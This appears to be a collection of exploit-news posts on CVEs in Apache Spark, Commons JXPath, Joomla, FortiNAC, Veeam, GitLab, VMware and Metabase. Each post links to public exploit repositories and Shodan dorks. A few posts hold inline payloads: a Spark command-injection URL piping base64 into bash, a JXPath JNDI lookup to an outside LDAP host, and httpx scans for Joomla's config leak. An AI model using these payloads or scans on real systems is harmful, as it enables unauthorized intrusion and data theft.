💉 Apache Spark RCE (CVE-2022-33891)

Apache Spark could allow an attacker to execute arbitrary commands on the system, caused by improper input validation of code path in HttpSecurityFilter when ACSs are enabled. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

PoC (Sleep 10):
https://localhost:8080/?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash`

Exploits:
https://github.com/HuskyHacks/cve-2022-33891
https://github.com/W01fh4cker/cve-2022-33891
https://github.com/west-wind/CVE-2022-33891

Shodan Dorks:
http.favicon.hash:856048515

#apache #spark #rce #cve

⚙️ Apache Commons Jxpath (CVE-2022-41852)

This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

#apache #commons #jxpath #cve #exploit

⚙️ Joomla Web Service Endpoint Access (CVE-2023-23752)

An issue was discovered in Joomla 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.

PoC:

httpx -l targets.txt -sc -ct -ip -path '/api/index.php/v1/config/application?public=true' 

Research:
https://unsafe.sh/go-149780.html

Nuclei Template:
https://github.com/thecyberneh/nuclei-templatess/blob/main/cves/2023/CVE-2023-23752.yaml

#joomla #endpoint #access #cve

💥 Fortinet FortiNAC Unauthenticated RCE

On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.

PoC:
https://github.com/horizon3ai/CVE-2022-39952

Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/

#fortinet #fortinac #rce #cve

Veeam Backup and Replication (CVE-2023-27532)

Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.

Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/

Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532

Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532

Exploit 3 (RCE):
https://github.com/puckiestyle/CVE-2023-27532-RCE-Only

#veeam #credentials #rce #cve

⚙️ Joomla < 4.2.8 — Unauthenticated Information Disclosure (CVE-2023-23752)

Research:
https://vulncheck.com/blog/joomla-for-rce

Exploit:
https://github.com/Acceis/exploit-CVE-2023-23752

UPD:

httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'

#joomla #information #disclosure #cve

🎯 GitLab CE/EE Path Traversal Vulnerability (CVE-2023-2825)

On May 23, 2023, GitLab released version 16.0.1, which addressed a critical vulnerability, CVE-2023-2825, impacting both the Community Edition (CE) and Enterprise Edition (EE) version 16.0.0. This vulnerability enables unauthenticated users to read arbitrary files by exploiting a path traversal bug. Additionally, an unauthenticated malicious user can leverage a path traversal vulnerability to read arbitrary files on the server if there is an attachment present in a public project nested within a minimum of five groups.

Shodan Dork:
application-77ee44de16d2f31b4ddfd214b60b6327fe48b92df7054b1fb928fd6d4439fc7e.css

Research:
https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/

PoC:
https://github.com/Occamsec/CVE-2023-2825

#gitlab #path #traversal #poc #cve

🔥 VMware vRealize Network Insight — Pre-authenticated RCE (CVE-2023-20887)

This post will examine the exploitation process of CVE-2023-20887 in VMware Aria Operations for Networks (formerly known as vRealize Network Insight). This vulnerability comprises a chain of two issues leading to Remote Code Execution (RCE) that can be exploited by unauthenticated attackers.

Exploit:
https://github.com/sinsinology/CVE-2023-20887

Research:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

#VMware #vRealize #rce #cve

Ⓜ️ Metabase Pre-auth RCE

Earlier this week, it was reported that Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 has a vulnerability that allows attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646.

Research:
https://blog.calif.io/p/reproducing-cve-2023-38646-metabase

PoC:
https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe

#metabase #cve #poc #rce

⚔️ GitLab CE/EE Preauth RCE (CVE-2021-22205)

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

❗️Affect Versions:

>=11.9, <13.8.8
>=13.9, <13.9.6
>=13.10, <13.10.3

🌐 Source:
https://github.com/inspiringz/CVE-2021-22205

#gitlab #rce #cve